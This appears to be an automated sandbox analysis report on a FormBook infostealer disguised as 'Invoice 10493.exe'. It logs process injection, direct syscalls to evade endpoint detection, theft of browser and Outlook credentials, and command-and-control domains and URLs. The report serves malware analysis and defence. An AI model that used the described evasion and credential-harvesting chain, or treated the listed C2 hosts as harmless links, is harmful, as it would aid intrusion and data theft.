            Source: winrs.exe, 00000004.00000002.3396065012.0000000003285000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3396065012.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.1225378400.00000000032A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: winrs.exe, 00000004.00000002.3400480362.0000000008597000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.1239625858.000000000858B000.00000004.00000020.00020000.00000000.sdmp, -4EF4J77B.4.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
            Source: Invoice 10493.exeReversingLabs: Detection: 18%
            Source: unknownProcess created: C:\Users\user\Desktop\Invoice 10493.exe "C:\Users\user\Desktop\Invoice 10493.exe"
            Source: C:\Users\user\Desktop\Invoice 10493.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Invoice 10493.exe"
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"
            Source: C:\Windows\SysWOW64\winrs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Invoice 10493.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Invoice 10493.exe"Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Invoice 10493.exeStatic file information: File size 1225216 > 1048576
            Source: Invoice 10493.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Invoice 10493.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Invoice 10493.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Invoice 10493.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Invoice 10493.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Invoice 10493.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Invoice 10493.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: winrs.pdbGCTL source: svchost.exe, 00000002.00000003.1020364114.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1020564836.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1020591220.0000000003024000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Invoice 10493.exe, 00000000.00000003.967661103.0000000004720000.00000004.00001000.00020000.00000000.sdmp, Invoice 10493.exe, 00000000.00000003.967319169.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.969072880.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.971789230.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1052215785.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1052215785.000000000372D000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.1054819932.00000000037F1000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3398352065.0000000003ACD000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.1051748629.000000000364E000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3398352065.00000000039A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Invoice 10493.exe, 00000000.00000003.967661103.0000000004720000.00000004.00001000.00020000.00000000.sdmp, Invoice 10493.exe, 00000000.00000003.967319169.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.969072880.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.971789230.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1052215785.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1052215785.000000000372D000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.1054819932.00000000037F1000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3398352065.0000000003ACD000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.1051748629.000000000364E000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3398352065.00000000039A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: winrs.pdb source: svchost.exe, 00000002.00000003.1020364114.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1020564836.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1020591220.0000000003024000.00000004.00000020.00020000.00000000.sdmp
            Source: Invoice 10493.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Invoice 10493.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Invoice 10493.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Invoice 10493.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Invoice 10493.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Invoice 10493.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Invoice 10493.exeAPI/Special instruction interceptor: Address: 1856C0C
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFD8B2CD144
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFD8B2D0594
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFD8B2CFF74
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFD8B2CD6C4
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFD8B2CD864
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFD8B2CD004
            Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFD8B2CD144
            Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFD8B2D0594
            Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFD8B2CD764
            Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFD8B2CD324
            Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFD8B2CD364
            Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFD8B2CD004
            Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFD8B2CFF74
            Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFD8B2CD6C4
            Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFD8B2CD864
            Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFD8B2CD604
            Source: C:\Windows\SysWOW64\winrs.exeWindow / User API: threadDelayed 9629Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 1180Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exe TID: 2704Thread sleep count: 121 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\winrs.exe TID: 2704Thread sleep time: -242000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exe TID: 2704Thread sleep count: 9629 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\winrs.exe TID: 2704Thread sleep time: -19258000s >= -30000sJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\winrs.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\winrs.exeLast function: Thread delayed
            Source: winrs.exe, 00000004.00000002.3396065012.0000000003236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS({
            Source: RAVCpl64.exe, 00000003.00000002.3396572684.0000000000522000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.1343649279.000002BF2A74A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeProcess queried: DebugPortJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x709724Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x3EC35A4Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x3EC376BJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x3EC37E2Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x7024CFJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQueryInformationToken: Direct from: 0x701E1CJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x709531Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtCreateThreadEx: Direct from: 0x700AD8Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x7024FEJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x702542Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFD8B282651Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtAllocateVirtualMemory: Direct from: 0x70D409Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQuerySystemInformation: Direct from: 0x7095CDJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x3ECB3A9Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x70ABB4Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x70240DJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x70967CJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x7016E2Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x70025BJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7097C2
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Invoice 10493.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\winrs.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 7484Jump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeThread register set: target process: 7484Jump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeThread register set: target process: 7944Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Invoice 10493.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2AB8008Jump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Invoice 10493.exe"Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: Invoice 10493.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: RAVCpl64.exe, 00000003.00000002.3398223493.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.986803840.0000000000E00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: RAVCpl64.exe, 00000003.00000002.3398223493.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.986803840.0000000000E00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RAVCpl64.exe, 00000003.00000002.3398223493.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.986803840.0000000000E00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: RAVCpl64.exe, 00000003.00000002.3398223493.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.986803840.0000000000E00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.3395750472.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3398160795.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1052986194.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1051362204.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3398079757.0000000003740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\winrs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.3395750472.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3398160795.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1052986194.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1051362204.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3398079757.0000000003740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		111
            Security Software Discovery            		Remote Services1
            Email Collection            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Data from Local System            		4
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive4
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568482 Sample: Invoice 10493.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 31 www.dating-apps-az-dn5.xyz 2->31 33 www.beylikduzu616161.xyz 2->33 35 21 other IPs or domains 2->35 39 Suricata IDS alerts for network traffic 2->39 41 Antivirus detection for URL or domain 2->41 43 Multi AV Scanner detection for submitted file 2->43 47 5 other signatures 2->47 10 Invoice 10493.exe 2 2->10         started        signatures3 45 Performs DNS queries to domains with low reputation 33->45 process4 signatures5 57 Binary is likely a compiled AutoIt script file 10->57 59 Writes to foreign memory regions 10->59 61 Maps a DLL or memory area into another process 10->61 13 svchost.exe 10->13         started        process6 signatures7 63 Modifies the context of a thread in another process (thread injection) 13->63 65 Maps a DLL or memory area into another process 13->65 67 Queues an APC in another process (thread injection) 13->67 69 Switches to a custom stack to bypass stack traces 13->69 16 RAVCpl64.exe 13->16 injected process8 dnsIp9 25 thaor56.online 202.92.5.23, 49723, 49724, 49725 VNPT-AS-VNVNPTCorpVN Viet Nam 16->25 27 www.zxyck.net 118.107.250.103, 49739, 49740, 49741 OCENET-AS-APOCESdnBhdISPMY Hong Kong 16->27 29 7 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 winrs.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Invoice 10493.exe19%ReversingLabsWin32.Trojan.AutoitInject
            Invoice 10493.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.oztalkshw.store0%Avira URL Cloudsafe
            http://www.dailyfuns.info/n9b0/?IUY=A8VrqyfvUbO/Hw2LPQ4NsXlD/s5AVNHZj5dGp0FbdWJo87i+fAzGqYzWbkPjYDkNrmWhazG0hIjSjfnpkftd/stSTEWpskOuncpocPTypnt0UF6pA8n7oU4=&h7i-=tZtx0%Avira URL Cloudsafe
            http://www.zxyck.net/gxyh/?IUY=xivIugper8hSVuoO04jTuRZuLjO4xxMGnAUBMzrp/j5qvAoCvNj6F2x9r/oRQ/YEeKRSLhAnFUBxmqELIOT+5QAFQKguKJNKmb5QmpQkz0/MRH6o2CbFa8M=&h7i-=tZtx0%Avira URL Cloudsafe
            http://www.earbudsstore.shop/0gis/0%Avira URL Cloudsafe
